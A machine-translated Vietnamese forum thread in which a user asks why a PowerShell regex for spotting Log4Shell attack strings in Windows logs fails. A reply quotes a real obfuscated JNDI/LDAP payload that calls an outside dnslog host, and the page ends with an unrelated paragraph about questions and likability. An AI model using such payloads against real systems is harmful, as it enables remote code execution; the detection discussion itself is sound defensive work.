Sử dụng Powershell để kiểm tra Nhật ký hệ thống cho Log4Shell

Kurtz1337

11:55, 16/04/2023

Tôi hiện đang cố kiểm tra nhật ký trên các máy Windows khác nhau để kiểm tra xem có bất kỳ cuộc tấn công Log4Shell nào nhằm vào hệ thống của chúng tôi hay không. Nền tảng đã hoàn thành và có thể kiểm tra các mẫu biểu thức chính quy dễ dàng. Nếu bây giờ tôi sử dụng mẫu biểu thức chính quy đã biết cho các cuộc tấn công Log4Shell thì Powershell sẽ đưa ra một số lỗi cấu trúc nhóm không được nhận dạng.

Regex sẽ trông như thế này:

\${(\${(.*?:|.*?:.*?:-)('|"|`)*(?1)}*|[jndi:lapsrm]('|"|`) *}*){9,11}

Đây là Chuỗi tôi đã sử dụng cho Regex trong Powershell với các ký tự thoát cần thiết:

$RX = "\$`{(\$`{(.*?:|.*?:.*?:-)('|`"|``)*(?1)}*|[jndi:lapsrm ]('|`"|``)*}*){9,11}"

Có một sai lầm tôi đã làm với định dạng? Hoặc có một số lỗi kỳ lạ trong nhận dạng Powershell Regex?

0 + 0

biểu thức chính quy

log4j

lspci

mfinni

17:48, 16/04/2023

Tôi không thể nhận xét về cú pháp biểu thức chính quy của bạn, nhưng điều này là không đủ. Có rất nhiều ví dụ trên web về những người sử dụng các ký tự thoát khác nhau để làm xáo trộn cuộc gọi JNDI. ${j${KPW:MnVQG:hARxLh:-n}d${cMrwww:aMHlp:LlsJc:Hvltz:OWeka:-i}:${jgF:IvdW:hBxXUS:-l}d${IGtAj:KgGmt:mfEa :-a}p://1639227068302CJEDj.kfvg5l.dnslog.cn/249540} https://databricks.com/blog/2021/12/13/log4j2-vulnerability-cve-2021-44228-research-and-assessment.html

Hồi đáp

Phan Văn Trường

Câu hỏi này là trong các ngôn ngữ khác:

EN: Using Powershell to check System logs for Log4Shell

TH: การใช้ Powershell เพื่อตรวจสอบบันทึกของระบบสำหรับ Log4Shell

RO: Folosind Powershell pentru a verifica jurnalele de sistem pentru Log4Shell

RU: Использование Powershell для проверки системных журналов для Log4Shell

VI: Sử dụng Powershell để kiểm tra Nhật ký hệ thống cho Log4Shell

Đăng câu trả lời

Hầu hết mọi người không hiểu rằng việc đặt nhiều câu hỏi sẽ mở ra cơ hội học hỏi và cải thiện mối quan hệ giữa các cá nhân. Ví dụ, trong các nghiên cứu của Alison, mặc dù mọi người có thể nhớ chính xác có bao nhiêu câu hỏi đã được đặt ra trong các cuộc trò chuyện của họ, nhưng họ không trực giác nhận ra mối liên hệ giữa câu hỏi và sự yêu thích. Qua bốn nghiên cứu, trong đó những người tham gia tự tham gia vào các cuộc trò chuyện hoặc đọc bản ghi lại các cuộc trò chuyện của người khác, mọi người có xu hướng không nhận ra rằng việc đặt câu hỏi sẽ ảnh hưởng—hoặc đã ảnh hưởng—mức độ thân thiện giữa những người đối thoại.